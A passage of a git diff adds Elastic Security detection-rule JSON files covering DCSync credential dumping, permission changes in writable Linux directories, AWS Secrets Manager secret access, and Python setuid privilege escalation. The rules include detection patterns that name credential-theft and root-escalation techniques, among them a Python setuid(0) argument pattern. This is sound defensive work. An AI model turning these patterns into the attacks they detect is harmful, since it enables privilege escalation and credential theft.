"https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "9f962927-1a4f-45f3-a57b-287f2c7029c1_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_113.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_113.json new file mode 100644 index 00000000000..bc2c07c29aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_113.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via DCSync", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that use the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set). It also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)).\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect, investigate if it is the case, and if it is properly secured. If noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. If this rule is noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where event.action : (\"Directory Service Access\", \"object-operation-performed\") and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\")\n\n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\n \"*$\", \"MSOL_*\", \"OpenDNS_Connector\", \"adconnect\", \"SyncADConnect\",\n \"SyncADConnectCM\", \"aadsync\", \"svcAzureADSync\", \"-\"\n )\n\n /* The Umbrella AD Connector uses the OpenDNS_Connector account to perform replication */\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "9f962927-1a4f-45f3-a57b-287f2c7029c1_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_209.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_209.json new file mode 100644 index 00000000000..42efa8a0589 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_209.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution.", + "false_positives": [ + "Certain programs or applications may modify files or change ownership in writable directories. These can be exempted by username." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "File Permission Modification in Writable Directory", + "new_terms_fields": [ + "host.id", + "process.parent.executable", + "process.command_line" + ], + "query": "host.os.type:linux and event.category:process and event.type:start and\nprocess.name:(chattr or chgrp or chmod or chown) and process.working_directory:(/dev/shm or /tmp or /var/tmp) and\nnot process.parent.name:(apt-key or update-motd-updates-available)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9f9a2a82-93a8-4b1a-8778-1780895626d4", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "9f9a2a82-93a8-4b1a-8778-1780895626d4_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_210.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_210.json new file mode 100644 index 00000000000..18621c0401d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_210.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution.", + "false_positives": [ + "Certain programs or applications may modify files or change ownership in writable directories. These can be exempted by username." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "File Permission Modification in Writable Directory", + "new_terms_fields": [ + "host.id", + "process.parent.executable", + "process.command_line" + ], + "query": "host.os.type:linux and event.category:process and event.type:start and\nprocess.name:(chattr or chgrp or chmod or chown) and process.working_directory:(/dev/shm or /tmp or /var/tmp) and\nnot process.parent.name:(apt-key or update-motd-updates-available)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9f9a2a82-93a8-4b1a-8778-1780895626d4", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "9f9a2a82-93a8-4b1a-8778-1780895626d4_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_309.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_309.json new file mode 100644 index 00000000000..0a4510b5fbd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_309.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Nick Jones", + "Elastic" + ], + "description": "An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a specific secret value from Secrets Manager using the `GetSecretValue` action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service would rely on the compromised service's IAM role to access the secrets in Secrets Manager.", + "false_positives": [ + "Verify whether the user identity, user agent, and/or hostname should be using GetSecretString API for the specified SecretId. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-60m", + "history_window_start": "now-15d", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen AWS Secret Value Accessed in Secrets Manager", + "new_terms_fields": [ + "user.id", + "aws.cloudtrail.request_parameters" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen AWS Secret Value Accessed in Secrets Manager\n\nAWS Secrets Manager is a service that enables the replacement of hardcoded credentials in code, including passwords, with an API call to Secrets Manager to retrieve the secret programmatically.\n\nThis rule looks for the retrieval of credentials using `GetSecretValue` action in Secrets Manager programmatically. This is a [New Terms](https://www.elastic.co/guide/en/security/master/rules-ui-create.html#create-new-terms-rule) rule indicating this is the first time a specific user identity has successfuly retrieved a specific secret value from Secrets Manager within the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the account and its role in the environment, and inspect the related policy.\n- Identify the applications that should use this account.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage and historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Review IAM permission policies for the user identity and specific secrets accessed.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher confidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:aws.cloudtrail and event.provider:secretsmanager.amazonaws.com and\n event.action:GetSecretValue and event.outcome:success and aws.cloudtrail.user_identity.session_context.session_issuer.type: Role and\n not user_agent.name: (\"Chrome\" or \"Firefox\" or \"Safari\" or \"Edge\" or \"Brave\" or \"Opera\")\n", + "references": [ + "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", + "https://detectioninthe.cloud/ttps/credential_access/access_secret_in_secrets_manager/", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a00681e3-9ed6-447c-ab2c-be648821c622", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 309 + }, + "id": "a00681e3-9ed6-447c-ab2c-be648821c622_309", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_3.json b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_3.json new file mode 100644 index 00000000000..933ca77c2ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_3.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Python cap_setuid", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.args : \"import os;os.set?id(0);os.system(*)\" and process.args : \"*python*\" and user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.action in (\"uid_change\", \"gid_change\") and event.type == \"change\" and \n (user.id == \"0\" or group.id == \"0\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a0ddb77b-0318-41f0-91e4-8c1b5528834f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + 